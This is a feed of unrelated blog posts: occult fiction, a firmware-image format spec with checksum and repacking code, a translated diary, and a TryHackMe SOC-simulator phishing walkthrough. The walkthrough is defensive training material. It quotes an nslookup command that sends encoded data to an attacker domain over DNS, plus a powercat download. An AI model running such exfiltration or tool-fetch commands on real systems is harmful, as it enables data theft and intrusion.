At absolute zero, there is no thermal motion. However, due to quantum effects, the particles still exhibit minimal motion mandated by the Heisenberg uncertainty principle and, for a system of fermions, the Pauli exclusion principle. Even if absolute zero could be achieved, this residual quantum motion would persist.

Although absolute zero can be approached, it cannot be reached. Some isentropic processes, such as adiabatic expansion, can lower the system's temperature without relying on a colder medium. Nevertheless, the third law of thermodynamics implies that no physical process can reach absolute zero in a finite number of steps. As a system nears this limit, further reductions in temperature become increasingly difficult, regardless of the cooling method used. In the 21st century, scientists have achieved temperatures below 100 picokelvin (pK). At low temperatures, matter displays exotic quantum phenomena such as superconductivity, superfluidity, and Bose–Einstein condensation.

Addendum 2: Rapture

The Bloom

The Song

Ecstasy

Exultation

Ubiquity

Omnilarity

Everywhere

Everywhen

Quantum Foam

Everything that can exist, does exist here. Everything that cannot exist, exists here. Everything that was and was not, what will be and will not be, exists here. This is all things, all times, all places, all thoughts, all possibilities and impossibilities.

This is the first moment, before any rules have been established, before up is up and down is down.

Ohmadrundi (a subset of machine elves) serve The Bloom.


Absolute Hot (Planck Temperature)

[[What Is The Hottest Temperature in The Known Universe, And Could We Achieve It]] https://www.straightdope.com/21341968/what-is-the-opposite-of-absolute-zero There is a limit, sort of, but it’s so inconceivably large that nobody but high energy physicists talks about it (although as I think about it absolute zero doesn’t exactly qualify as breakfast table chatter either). The highest possible temperature, called the Planck temperature, is equal to 10^32 degrees Kelvin. For comparison, the center of the sun bubbles along at 15 million K (15 × 10^6); silicon can be created by fusion at 1 billion K (10^9). In short, the Planck temperature is very toasty indeed.

Some scientists believe that we, or at least our universe, have already experienced the Planck temperature, although it went by so quickly you may have missed it. It occurred at 10^-43 of a second after the Big Bang, the great cataclysm in which the universe was born. (10^-43 of a second, in case you’re not hip to the notation, is an incredibly tiny fraction of time. Time enough to create the universe, but not, as a University of Chicago physicist was once at pains to explain, time enough to get off a disputed last-tenth-of-a-second shot against the Chicago Bulls.)

Absolute zero is easier to understand than the Planck temperature. What we perceive as heat is a function of motion. The colder something gets, the less internal motion or vibration its molecules exhibit. At absolute zero — that is, zero Kelvin or -460° Fahrenheit — molecular motion virtually stops. At that point whatever the molecules are a part of is as cold as it’s going to get.

There’s a lot more latitude in the opposite direction. The faster molecules move, the hotter they get. At 10^10 K electrons approach the speed of light, but they also become more massive, so their temperature can continue to rise. At 10^32 K such staggering densities obtain that greater temperature would cause each particle of matter to become its own black hole, and the usual understanding of space and time would collapse. Ergo, the Planck temperature is as hot as things can get. Or at least it’s the highest temp conceivable in present theory. There’s a chance when a quantum theory of gravity is worked out we may find even higher temperatures are possible. The prospect, frankly, leaves me cold.

Addendum 3: The Mirror Realm

Also called “Ouroboros”

Chirality is not a word you are likely to hear in everyday conversation, but it is at the heart of the final place we must consider: The Mirror Realm.

To understand the idea simply, look at your hands. Despite the fact that they seem functionally identical at first glance, there is no direction or method by which your left hand could be held or manipulated into being your right hand.

This feature of our reality is called “chirality” – there are structures that cannot be reshaped into their mirror images without destroying them or fundamentally changing their function.

This “handedness” goes deeper than our hands and into our DNA, the food we eat, the forces and fields that bind our base elements together and allow us to exist as complex, thinking biological systems and further extends into the other places written above.

There is a preferred direction in which we all twist that cannot be undone. Our multiverse is incompatible with the idea. To wit, “mirror” proteins cannot nourish us and “mirror” energies would be vastly different in how they functioned and may not function at all.

And yet, we see into a world that flips the direction effortlessly every time we see our own reflection in a mirror.

Mirrors offer us a window into another reality which resembles ours but where the rules are very different. As I said, we can easily project an image of ourselves into this version of reality, but could we truly step into it?

Before answering that, let us discuss the art of scrying, divining by looking into something akin to a black mirror or, rather, looking beneath the surface of the black mirror. Why would scrying produce tangible results? Why would peering into a reflection of our own world provide any insight into our own?

I have already mentioned that the laws are different in that place, but you must also consider how freely we reflect. Every drop of water and snowflake, every pane of glass, every polished boot, every silver earring, every chrome pipe, every phone screen and television, every set of mirrors attached to automobiles, produces reflections. Our entire world is reflected into this mirror realm. It is impossible not to reflect ourselves multiple times a day.

To scry is to peer sideways into the mirror realm and find insight. It is to look beyond your own reflection, to ignore it and see what lies behind it and beneath it. The scryer finds our own reality broken into pieces, fragmented, seen from a thousand different angles, atomized and rarefied down to essentials. The wise mind understands how to combine these snippets into a clearer picture of the whole than if they had seen it firsthand. This direction, seeing the back of reality, the mirror, gives them insight which can be translated back into truths valid in our own reality.

If such power can be had by simply looking how much greater would it be to walk within?

As I have said, chirality means the essence of our reality is not compatible with the mirror realm. There is life there, of a kind, but not life we would recognize. Monstrous life that only moves when we aren’t looking because our perception of it from our side of the glass renders it invisible and freezes it in time. Stare at a mirror in the dark long enough and you will start to see evidence of them in the way your own reflection morphs into something unrecognizable. But they cannot hurt us and we cannot harm them. We are simply incompatible.

However, if someone were to step through the mirror, into the mirror realm itself, then we become briefly tethered to their reality. For a short time, we can breathe the air, we can walk along the surfaces, we can hear and see. All the while, our flesh is fighting an invisible battle against molecules that are not designed for us. A buzzing in the ears, a bloody nose, blurry vision, hallucinations, nausea.

And the things that live there are slowly but surely no longer bound by our perception. They turn their multifaceted eye stalks and twitch with unexpected motion, able to watch and plan.

How do you think an intelligent creature would feel about finally being able to confront one of those hateful things whose very gaze once paralyzed them?

Mirror Walkers claim that time does not pass for them on the other side of the glass. They will tell you that they cross incalculable distances in fractions of a second and that there is no living thing on the other side that can catch them because of the speed with which they traverse the place.

It is up to you whether or not you wish to believe them.

Addendum 4: The In Between

The In Between is a strange corollary to The Mirror Realm, a place visited by few and often whispered of as if little more than a fairy tale.

In stories, it is a stale, stagnant place outside of time yet between spaces. One could stay here forever and never age a day. The only cost being ambition and drive.

At the edges, a visitor can see out but cannot be seen, making it an ideal method of clandestine information gathering.

Why would this place be considered a sibling to The Mirror Realm?

The most common way to enter The In Between is to step inside a wall.

Addendum 5: The Fae

They exist. They flit between layers of reality as easily as turning a page in a book. But where are they from? Where do they live?

I can only speculate. Even the shadows merely cough and gasp in what passes for their laughter when I ask, refusing to give an answer.

Perhaps the answer lies in other liminal, transitional places such as The Fugue or The In Between. Perhaps the answer is in yet another nameless direction in which I will have to learn to peer. That would at least explain why they are so unpredictable: they operate under a different set of rules, entirely.


#Psychomancer #Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #ParanormalFiction

 

from Psychomancer

The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.

But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.

We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies—built of atoms and molecules—cannot go. These worlds are just as real, just as vibrant.

And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even “project” something of themselves down to our level as emissaries or explorers such as many-named Nyarlet'hotep and its lesser-known siblings NAM, NUM, and IM.

But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need not obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can't even truly look at them because, to us, those angles, do not exist.

We call them gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.

Is it any wonder that imps, gremlins, fae, demons, all the so-called “lesser” outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or mock us? Who can say? Their minds and motives are just as alien.

So who did I meet that unusually warm Saturday night?

I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.

Not my front door, nor my back door.

It came from my basement door.

If I were a cat, my hackles would be raised. Instead, a sort of panic hit, wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.

I have no guns, no serious weapons save a ceremonial sword mounted much too far out of reach.

I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.

I can't recall seeing his eyes.

“Excellent!” he said in a thick British accent stolen from Austin Powers.

“This is one where you listen.”

“Are you doing a bit?” I grasped, looking past him for a cameraman or some hint that this was a misguided joke.

“A bit?” He rubbed his chin with his right hand. “I don't think so.”

He offered his left hand.

“Archibald Horatio Pierse, IV,” he said, overly emphasizing The Fourth as if it was of great importance. “Pierse with an 's',” concluded his introduction.

He was still shaking my hand, which I didn't remember offering in return.

“Sometimes,” he said. “I like to pop in and give a bloke or bird who's almost got it a little glimpse of the whole.”

'bloke or bird,' I thought. This has to be a bit.

“Right,” he said, no longer shaking my left hand, but still holding it.

The world fractured, splintered. Every cell pulled in a different direction.

Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.

We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.

We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.

There is no pattern, no spider's web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.

When we dream, we are free to reach into the other us-es and become them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.

Gender, race, nationality, species, moral character, upbringing: I am every possibility.

I am every drop in the ocean and the ocean itself.

I am the sky, the moon, the stars, a worm, a bacteria, a lichen.

The one who showed me—I had forgotten he existed—he bade me, “turn around.”

What a strange request! I am all that is and was. Do I not already “see” in every direction?

“Turn around.”

A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a new direction.

Syzygy.

I am All, yet All That is Not Me is also All.

I see the tapestry, the enmeshed pattern.

The beauty.

The belonging.

The Love.

Every part of me weeps.

An infinity of infinities.

Each unique.

Together, whole.

Like curtains dancing in the breeze.

Like a rainstorm.

Like staring at the sun.

Like the song of cicadas.

Unity.

From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…

All is One and One is All.

Then I'm lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.

And I can't stop crying.


I think I will stretch you sideways.
I think I shall stretch you sideways.
Why don't I show you what sideways looks like?
How about sideways?
What about sideways"?
I'd like to show your sideways.

I thinkdon't I willshall I showstretchsideways youwhatsideways looks like.

#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal

 

from Tom Tildavaan

Whatever your take on Apple, they do make products that are beautiful. Beauty in design, beauty in simplicity. As I am typing this on my Macbook, I see crisp fonts, I see gorgeous icons.

Now, mass-produced gadgets from China usually lack that design fine-tuning even when the hardware is amazing.

Starting from serif fonts that make your 24-bit FLAC-playing DAP look like a typewriter from the 90s, to the hodgepodge of icons and backgrounds.

Usually these devices do not support custom theming, but we are going to change this a bit with Waterjet.

In the coming months we will be releasing docs and tools for decrypting, unpacking, updating and re-packing the firmware resources of devices built on Actions Semiconductor ATJ212X, ATJ215X and other chips that use the μC/OS-based SDK, letting everyone personalize their devices without needing the SDK from Actions.

And to the vendors who ship these devices: you would give your customers a better experience if you ran the fonts and designs past a designer, and then we would not need to do any of this.

And to start us off, here is the format of FWIMAGE.FW for ATJ212X devices.

Actions Semiconductor FWIMAGE.FW Specification

1. File Structure

The firmware image is a sector-based container (512 bytes per sector) with a fixed-size header area of 16 sectors (8192 bytes): the global header in sector 0, followed by the LDIR table in sectors 1 to 15. Component data starts at sector 16.

| Section        | Size           | Description                                        |
|----------------|----------------|----------------------------------------------------|
| Global Header  | 512 bytes      | Basic metadata (Magic, VID/PID, Ver)               |
| LDIR Table     | 240 * 32 bytes | Fixed-size Logical Directory entries for all files |
| Component Data | Variable       | Raw binary data for drivers, APs, and STY files    |

2. Global Header (Sector 0)

The first 512 bytes contain the system metadata.

| Offset | Size | Description                                                      |
|--------|------|------------------------------------------------------------------|
| 0x00   | 4    | Magic: 0x0FF0AA55                                                |
| 0x04   | 4    | SDK Version (ASCII)                                              |
| 0x08   | 4    | Firmware Version (ASCII)                                         |
| 0x0C   | 2    | Vendor ID (VID)                                                  |
| 0x0E   | 2    | Product ID (PID)                                                 |
| 0x10   | 4    | LDIR Checksum (Stride 4)                                         |
| 0x50   | 48   | USB Setup Info (ASCII)                                           |
| 0x80   | 336  | SDK Description (ASCII)                                          |
| 0x1FA  | 4    | R3 Config Sector Offset (pointer to DEVINFO.BIN)                 |
| 0x1FE  | 2    | Global Header Checksum (16-bit word sum of the first 510 bytes)  |

3. Logical Directory (LDIR) Table

Starting at offset 0x200 (sector 1) and ending at 0x2000 (the start of sector 16), so the table occupies sectors 1 to 15. This is a static table of exactly 240 entries of 32 bytes each (7680 bytes). Unused entries are null-padded.

| Offset | Size | Description                                                            |
|--------|------|------------------------------------------------------------------------|
| 0x00   | 8    | Filename (8.3 format, space padded)                                    |
| 0x08   | 3    | Extension (ASCII)                                                      |
| 0x0B   | 5    | Padding                                                                |
| 0x10   | 4    | Sector Offset: start position in sectors (absolute position = offset * 512) |
| 0x14   | 4    | File Size: size in bytes                                               |
| 0x18   | 4    | Reserved                                                               |
| 0x1C   | 4    | File Checksum (Stride 4 sum)                                           |

4. Checksums

Global Header Checksum

The last two bytes of the Sector 0 header (offset 0x1FE) contain a 16-bit checksum of the first 510 bytes using a 2-byte stride.

#include <stdint.h>
#include <stddef.h>

/* Sums the header as little-endian 16-bit words; the sum wraps at 16 bits.
 * len is 510 for sector 0 (everything before the checksum field) and must be
 * even: the loop stops before reading a byte past the end of the buffer. */
uint16_t calculate_header_checksum(const uint8_t *data, size_t len) {
    uint16_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2) {
        uint16_t val = (uint16_t)data[i] | ((uint16_t)data[i+1] << 8);
        sum += val;
    }
    return sum;
}

LDIR & File Checksum Algorithm (Stride 4)

Accumulates 32-bit words interpreted as little-endian. The sum naturally wraps at 32 bits.

#include <stdint.h>
#include <stddef.h>

/**
 * Calculates the Actions Stride-4 checksum.
 * Bytes are assembled into words one at a time, so the buffer needs no
 * particular alignment.
 * @param data Pointer to the buffer
 * @param len  Length of data in bytes (should be a multiple of 4; any
 *             trailing 1-3 bytes are ignored rather than read out of bounds)
 * @return 32-bit unsigned checksum
 */
uint32_t calculate_checksum_s4(const uint8_t *data, size_t len) {
    uint32_t sum = 0;
    for (size_t i = 0; i + 3 < len; i += 4) {
        uint32_t val = (uint32_t)data[i] |
                       ((uint32_t)data[i+1] << 8) |
                       ((uint32_t)data[i+2] << 16) |
                       ((uint32_t)data[i+3] << 24);
        sum += val;
    }
    return sum;
}

Sector Alignment

Every file within the image must start on a 512-byte boundary. When packing, pad each file with null bytes up to the next sector boundary; the LDIR entry still records the unpadded size in bytes.

Boot Sequence

The firmware expects KERNEL.DRV and CONFIG.BIN to be present at specific LDIR indices or sector offsets defined by the bootloader. When re-packing, keep them at the same LDIR index and the same sector offset they occupied in the original image.
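As an added example (not part of the original post or of the Waterjet tooling), here is a Python parser and packer for the container as specified above, so that the layout and both checksum algorithms can be checked end to end before touching a real device. Where the spec is silent it makes four assumptions, each marked in the code: the LDIR checksum in the header covers the whole 7680-byte table; a file's checksum is computed over its File Size bytes, zero-padded to a multiple of 4; an unused LDIR entry is recognised by an all-NUL filename field; and the R3 config pointer is zero when no DEVINFO.BIN is present. The version strings, VID/PID and file contents used in the round trip are constructed placeholders, not values from any real firmware.

```python
"""Parser and packer for the FWIMAGE.FW container laid out above (added example)."""
import struct

SECTOR = 512
HEADER_SECTORS = 16                 # sector 0: global header, sectors 1..15: LDIR
LDIR_ENTRIES = 240
LDIR_ENTRY_SIZE = 32
LDIR_BYTES = LDIR_ENTRIES * LDIR_ENTRY_SIZE   # 7680 bytes = 15 sectors
MAGIC = 0x0FF0AA55


def checksum_s2(data: bytes) -> int:
    """Global header checksum: 16-bit wrapping sum of little-endian 16-bit words."""
    words = struct.unpack_from("<%dH" % (len(data) // 2), data)
    return sum(words) & 0xFFFF


def checksum_s4(data: bytes) -> int:
    """LDIR/file checksum: 32-bit wrapping sum of little-endian 32-bit words.
    Input whose length is not a multiple of 4 is zero-padded first (assumption)."""
    data = bytes(data) + b"\0" * (-len(data) % 4)
    words = struct.unpack_from("<%dI" % (len(data) // 4), data)
    return sum(words) & 0xFFFFFFFF


def parse_image(image: bytes) -> dict:
    """Validate header, LDIR and file checksums; return metadata and file contents."""
    if len(image) < HEADER_SECTORS * SECTOR or len(image) % SECTOR:
        raise ValueError("image shorter than the header area or not sector-aligned")
    hdr = image[:SECTOR]
    magic, = struct.unpack_from("<I", hdr, 0x00)
    if magic != MAGIC:
        raise ValueError("bad magic 0x%08X" % magic)
    stored_sum, = struct.unpack_from("<H", hdr, 0x1FE)
    if stored_sum != checksum_s2(hdr[:0x1FE]):
        raise ValueError("global header checksum mismatch")
    ldir_sum, = struct.unpack_from("<I", hdr, 0x10)
    table = image[SECTOR:SECTOR + LDIR_BYTES]
    if ldir_sum != checksum_s4(table):          # assumption: covers the whole table
        raise ValueError("LDIR checksum mismatch")
    vid, pid = struct.unpack_from("<HH", hdr, 0x0C)
    r3_sector, = struct.unpack_from("<I", hdr, 0x1FA)
    entries = []
    for i in range(LDIR_ENTRIES):
        e = table[i * LDIR_ENTRY_SIZE:(i + 1) * LDIR_ENTRY_SIZE]
        if e[:8] == b"\0" * 8:                  # assumption: unused entry is all NUL
            continue
        sector, size, _reserved, file_sum = struct.unpack_from("<IIII", e, 0x10)
        start = sector * SECTOR
        if start + size > len(image):
            raise ValueError("LDIR entry %d points past the end of the image" % i)
        data = image[start:start + size]
        if checksum_s4(data) != file_sum:       # assumption: sum over the unpadded size
            raise ValueError("file checksum mismatch in LDIR entry %d" % i)
        name = e[:8].decode("ascii", "replace").rstrip()
        ext = e[8:11].decode("ascii", "replace").rstrip()
        entries.append({"index": i, "name": name + "." + ext, "sector": sector,
                        "size": size, "data": data})
    return {"sdk_version": hdr[0x04:0x08].decode("ascii", "replace"),
            "fw_version": hdr[0x08:0x0C].decode("ascii", "replace"),
            "vid": vid, "pid": pid, "r3_config_sector": r3_sector, "entries": entries}


def build_image(files, sdk_version=b"3.10", fw_version=b"1.00", vid=0x1234, pid=0x5678):
    """Pack (name, ext, data) tuples into an image: 8.3 names, sector-aligned data,
    stride-4 file/LDIR checksums and the stride-2 header checksum. The default
    version strings and VID/PID are constructed placeholders, not real device IDs."""
    if len(files) > LDIR_ENTRIES:
        raise ValueError("LDIR holds at most %d entries" % LDIR_ENTRIES)
    table = bytearray(LDIR_BYTES)
    body = bytearray()
    next_sector = HEADER_SECTORS                # first data sector follows the LDIR
    for i, (name, ext, data) in enumerate(files):
        if len(name) > 8 or len(ext) > 3:
            raise ValueError("%s.%s does not fit the 8.3 name field" % (name, ext))
        off = i * LDIR_ENTRY_SIZE
        struct.pack_into("<8s3s", table, off, name.encode("ascii").ljust(8),
                         ext.encode("ascii").ljust(3))           # space padded
        struct.pack_into("<IIII", table, off + 0x10, next_sector, len(data), 0,
                         checksum_s4(data))
        padded = bytes(data) + b"\0" * (-len(data) % SECTOR)     # pad to sector
        body += padded
        next_sector += len(padded) // SECTOR
    hdr = bytearray(SECTOR)
    struct.pack_into("<I4s4sHHI", hdr, 0x00, MAGIC, sdk_version, fw_version,
                     vid, pid, checksum_s4(table))
    struct.pack_into("<I", hdr, 0x1FA, 0)       # assumption: no DEVINFO.BIN here
    struct.pack_into("<H", hdr, 0x1FE, checksum_s2(hdr[:0x1FE]))
    return bytes(hdr) + bytes(table) + bytes(body)


if __name__ == "__main__":
    # Constructed round trip: pack two files, then parse and verify the result.
    img = build_image([("KERNEL", "DRV", b"\x01\x02\x03\x04" * 300),
                       ("CONFIG", "BIN", b"hello")])
    for entry in parse_image(img)["entries"]:
        print("%-12s sector %3d  %5d bytes" % (entry["name"], entry["sector"], entry["size"]))
```

To use it on a real dump, read the file and call parse_image() on it. A checksum mismatch on an image the device happily boots means one of the assumptions above does not hold for that SDK build (most likely the exact span covered by the LDIR or file checksum), which is worth establishing before re-packing anything, since a mis-summed image is the difference between a themed player and a bricked one.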


Interested in the format of ATJ215X firmware? It is an encrypted sqlite3 database, and the encryption has already been reverse-engineered: see the atjboottool sources in Rockbox.

 

from লোকমানুষ এর ব্লগ


Moushumi Bhowmik's song suddenly came back to me today: “Why all this pointless running, speaking one word after another, living for oneself, with oneself…”. Somehow the song has become the spokesperson of these days. The words are no longer just a melody; they are now companions of my breath.

The days are now beyond counting, scattered about like loose stones, each lying wherever it fell. I can find no boundary between yesterday morning and this afternoon. The dictionary has no new word to separate the two days. Every day the same window, the same light and shadow, the same race of the clock's hands. Creases of irritation gather on the forehead, but the next moment I think: is even this little not something? Time could have wrecked far more, yet some order still survives.

For the last few days the body has been in revolt. One day a fever came and wiped out the reckoning of time altogether. I opened my eyes: morning; opened them again: noon; once more: evening was already saying goodbye. The fever has gone, but it has left behind a sore throat and its cruel companion, a headache. And to keep them company there remains a mild cough, a very familiar enemy. For me the memory of a cough is like leather soaked in soapy water; the shadow of an old illness settles on the mind. Sometimes the body reminds you that memory is written not only in the mind but in the cells of the flesh as well.

What I used to enjoy now seems grey. Books, music, films: all as lifeless as grey paper soaked in water. The most astonishing thing is this: where my heart used to melt at the sight of children, now somewhere in that place stands an irritation. I feel like staying away from their clamour, staying in silence. This change is the more frightening one: what once touched life has today turned into a tendency to withdraw into myself.

Leave! The word is now a synonym for prayer. But this leave is not only from the daily routine; it is leave from this inner silence, from this emotionless drift. Sometimes the wish arises to take leave from life itself, like a long, quiet sleep. But a deep, unspoken attachment to life still remains. Like an old house whose doors and windows are falling apart, but in whose every speck of dust memory clings. So the attachment is still there.

Standing at this age of life, one realizes that life is at once a “burden” and an “allotment”. Rather like climbing halfway up a mountain and looking back. The path below has been crossed, but the summit is still far off. And fatigue has accumulated in the body. Still one must go on, because the way down is impossibly rough.

I wrote today's scattered thoughts down on the pages of the diary; perhaps this emptiness is another form of fullness. Perhaps time is emptying the heart to make room for some deeper feeling to come. Just as the body becomes a little more sensitive after a fever passes, perhaps after this stillness of the soul some subtle ability to see or understand will return.

Today I will just write these words down, so that they remain a virtual witness to this moment. Perhaps on some future day I will look back, read these words, and try to understand whether the person who wrote them was really getting lost or had found some new shore.

Outside the window it is night now. In the window of some distant house a lamp is burning, a piece of human warmth. Perhaps life is really this: searching in the dark for a burning lamp, a lamp that may be on someone else's veranda, but whose light falls on our window too. For today this much is enough. Today I will simply be, and breathe. With this restless heart, this sick body, through this frozen time.

Perhaps living with oneself means just this: to touch, slowly, little by little, even these broken moments…

 

from plutogazer writeups

This is a guide to getting a 100% True Positive rate in the Phishing Unfolding SOC Simulator TryHackMe challenge room. Because this is just a walkthrough, I will avoid writing complete reports and just write the thought process behind each verdict instead.

Introduction and Considerations

The description of the room is the following:

Dive into the heat of a live phishing attack as it unfolds within the corporate network. In this high-pressure scenario, your role is to meticulously analyse and document each phase of the breach as it happens.

Can you piece together the attack chain in real-time and prepare a comprehensive report on the malicious activities?

In this SOC Simulator room we use Splunk to analyze alerts and try to identify potential phishing attacks. The room contains 36 alerts that start appearing, after a short delay, in the built-in SIEM of the SOC Simulator tool. The tool also provides case management, in which we write the report for each alert. Once an alert has been analyzed, we need to decide whether it is a True Positive or a False Positive, and whether it requires escalation to a superior. The Simulator also provides a VM with an integrated Threat Intelligence Platform called TryDetectThis. Because alerts keep arriving while we are analyzing a previous one, at some point there will be pages of “Unassigned” alerts. Prioritize the alerts the SIEM has marked with higher severity, and among those the ones with the oldest timestamps.

Many alerts are related to other alerts, or are simply False Positives. This writeup only covers the True Positive alerts and, where applicable, only the first alert in a chain of related alerts (I still had to analyze nearly all of them, because you never know!). The room also offers a “Documentation” tab containing a “Company Information” tab with details on the employees of the fictional company. This tab is useful during alert triage and for giving exhaustive information about the affected entities in the report.

Grading

The SOC Simulator, technically speaking, only cares about the alerts the user has identified as True Positives. Once all True Positives have been identified as such, the simulation ends even if there are still alerts in the queue. Furthermore, the written reports are “graded” by an LLM. The tool recommends the following format for reporting:

- Time of activity:
- List of Affected Entities:
- Reason for Classifying as True Positive:
- Reason for Escalating the Alert:
- Recommended Remediation Actions:
- List of Attack Indicators:

However, what the LLM actually seems to look for is the 5 Ws of alert triage (who, what, when, where and why). Even so, it sometimes misreads ordinary phrasing and deducts points unfairly. This is why I will not post complete reports here, just the thought process behind each verdict. As a rule of thumb, to score the maximum and reduce the LLM's margin of error, write down all relevant timestamps, all available information about the victims and other entities (from the Company Information section), the related events before and after the alert, the reasons for escalating (or not), and, where possible, the attack artifacts and the MITRE ATT&CK mapping. And, as always, make sure the 5 Ws can be found in your report.

Alert 1: Suspicious email from external domain (ID 1000) – Low severity

The information the SIEM gives us is (some output omitted):

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

sender:
eileen@trendymillineryco.me

recipient:
support@tryhatme.com

attachment:
None

content:
A long lost billionaire relative has left you their secret hat empire To claim your inheritance send us your banking details immediately

This is a classic phishing lure: it promises something extremely valuable in exchange for confidential (banking) information, so we classify it as a True Positive. The MITRE ATT&CK technique for Phishing is T1566. Let's check the log management tool (in my case, I chose Splunk) and search for the “eileen” address as a recipient, to see whether support actually replied with their banking details. The search returned no results, so it seems the user did not comply. As such, there is no need for escalation.

Alert 2: Suspicious email from external domain (ID 1003) – Low severity

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

timestamp
01/26/2026 21:15:30.473

subject:
Grow Your Hat Business Overnight with this Secret Formula

sender:
leonard@fashionindustrytrends.xyz

recipient:
yani.zubair@tryhatme.com

attachment:
None

content:
Unlock the ultimate strategy to skyrocket your hat empire No experience needed Just click and watch the profits roll in

At 01/26/2026 21:16:44.240, yani.zubair@tryhatme[.]com, which belongs to Yani Zubair from the IT department (hostname win-3449), received spam from leonard@fashionindustrytrends[.]xyz. The email used a common phishing lure (MITRE ATT&CK ID T1566): a promise of profit in return for clicking a link. Activity from Yani Zubair's host after the email was received was reviewed, and the Splunk logs showed no evidently malicious events, so the user appears to have ignored the message. It is a True Positive, but no escalation is required.

Alert 3: Suspicious Parent Child Relationship (ID 1025) – High severity

Description:
A suspicious process with an uncommon parent-child relationship was detected in your environment.

timestamp:
01/26/2026 21:45:42.473

host.name:
win-3450

process.name:
nslookup.exe

process.pid:
5520

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\nslookup.exe" UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io

process.working_directory:
C:\Users\michael.ascot\downloads\exfiltration\

event.action:
Process Create (rule: ProcessCreate)

This alert is HIGH severity, and it is not hard to see why. What exactly happened? Looking at what the SIEM gives us: on hostname win-3450, a powershell.exe (PID 3728) with the working directory C:\Users\michael.ascot\downloads\exfiltration\ spawned nslookup.exe to resolve a name under haz4rdw4re.io whose leftmost label looks like encoded data. This is the classic shape of DNS exfiltration. Before digging through the logs, let's check who win-3450 is. The Company Information tab tells us the device is used by Michael Ascot, michael.ascot@tryhatme[.]com, the CEO of the company. The alert seems to come out of nowhere, but we have a timestamp and the device creating these processes, so let's look at the events on this host a few minutes before and after the alert.

Splunk shows a long list of problematic events right after this one: multiple registry modifications and further process creations, including PowerShell downloading external resources (such as hxxps[://]raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat[.]ps1, which maps to Ingress Tool Transfer, T1105), more lookups of different encoded subdomains of haz4rdw4re.io, and commands such as systeminfo and whoami. None of this is normal or expected behaviour from any host. Data is clearly being exfiltrated through DNS queries (T1048.003, Exfiltration Over Unencrypted Non-C2 Protocol): the encoded subdomains are the data itself, and each query is carried by the victim's ordinary resolver all the way to the attacker's authoritative name server, so the host needs no direct internet access and the traffic blends into a protocol that is almost always allowed out and rarely inspected. whoami (T1033, System Owner/User Discovery) and systeminfo (T1082, System Information Discovery) are typical post-exploitation discovery commands that tell the attacker which user and machine they have landed on. We have now confirmed a True Positive, but we still don't know how it happened. Looking at earlier timestamps, right before this sequence of events a file named “ImportantInvoice-Febrary.zip” was created in the downloads directory, and the exfiltration subdirectory appeared shortly after. We have no information about where this file came from, so let's search for it in Splunk.

Eventually, using Splunk search filters, we find that at 01/26/2026 21:20:19.473 (25 minutes before the alert) the CEO's mailbox, michael.ascot@tryhatme.com, received an email with an attachment named ImportantInvoice-Febrary.zip. The subject and body claimed an account was about to be closed unless payment was processed, and told the reader to open the attachment to stop it. Yet another common phishing technique, or spearphishing in this case, since the target was the CEO; Spearphishing Attachment has the MITRE ATT&CK ID T1566.001. Note the small typo in the attachment name (Febrary instead of February), which is not uncommon in phishing emails. Unfortunately the CEO downloaded the file at 01/26/2026 21:40:26.47, as Splunk shows it being created at C:\Users\michael.ascot\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UP4KOJQB\ImportantInvoice-Febrary.zip, the cache path Outlook uses for opened attachments. The chain of malicious events follows from there.

With all this information, we can write quite a hefty report. We now know it's a True Positive and that it requires escalation.

Recommended Remediation Actions: isolate the host to prevent further movement, clean up the malware, phishing awareness training, Data Loss Prevention tooling, and add haz4rdw4re.io to the malicious-domain list (block it at the resolver, since the exfiltration rides on DNS). The file was also run through the TryDetectMe threat intelligence tool, which reported it as clean; report this too, since a clean reputation verdict is why hash-based controls missed it.

